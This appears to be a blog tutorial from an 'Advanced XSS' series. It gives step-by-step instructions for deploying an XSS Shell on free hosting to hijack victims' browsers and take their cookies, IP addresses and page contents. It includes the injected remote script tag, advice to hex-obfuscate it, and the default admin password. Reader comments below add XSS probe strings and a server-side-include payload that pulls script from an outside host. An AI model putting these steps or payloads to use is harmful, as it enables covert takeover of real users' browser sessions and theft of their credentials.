Hello
and welcome back to Advanced XSS.Today I will be covering the XSS
Shell.An XSS Shell gives the attacker full control over the victims
browser.The shell works inside an iframe environment.This allows the
attacker to keep control of the victims browser even if the slave is
browsing to new pages etc...The Shell also gets the victims ip,current
html page, and of course cookies.It basically allows the attacker to
execute virtually anything in javascript.
First, download the shell from SourceForce.Then make a free hosting
account on 7Host. Now, you will need to know the location of the
database.To accomplish this we will use a .asp command to retrieve the
database path.Make a file called "GetDB.asp" and put the following code
in.
CODE
<%
Response.Write Server.MapPath(".")
%>
Now upload all the files inside the xssshell folder to 7host to your
7Host account.I used Filezilla but, then I started having trouble so, I
started using the FlashFXP free trial.Once done uploading view the
GetDB.asp in your browser.It will show the Database location.Now open
the xssshell.asp in notepad or notepad++.Change the var = SERVER value
to the valid URL of your server.Now open the admin/db.asp file and edit
the DBPATH to the database path you found inside the GetDB.asp file and add the location of shell.mdb to the end.
Example:- DBPATH = "D:\user5\your_username\xssshell\db\shell.mdb"
Also change the password value to your liking.This can be found in the "If Trim(Pass)" variable.
Note: Default password is w00t.
Now, to edit the sample slave.Open /sample_victim/default.asp and edit
the script src to the location of your xssshell.asp file.
Example:- <script src=http://yoursite.com/xssshell/xssshell.asp></script>
You may disguise the script using hexing described in previous lessons (previous lessons listed at the bottom).
Congarts!You have just setup a XSS Shell.
Hi.I have uploaded XSS shell files in the free host .I accessed admin interface and tested sample_victim too. i don't know why it doesn't display the victim's IP and the IP isn't visible into admin interface.PLZ help me...
ReplyDeletenice !
ReplyDeletegzm You dnt Upload Perfect shell
ReplyDelete\x3csVg/\x3e
ReplyDeletex
ReplyDeletex
ReplyDeletevx
Deletex
ReplyDeleteDeamoN
ReplyDeletex">
ReplyDeletewqeqeq
ReplyDelete<!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"-->
ReplyDelete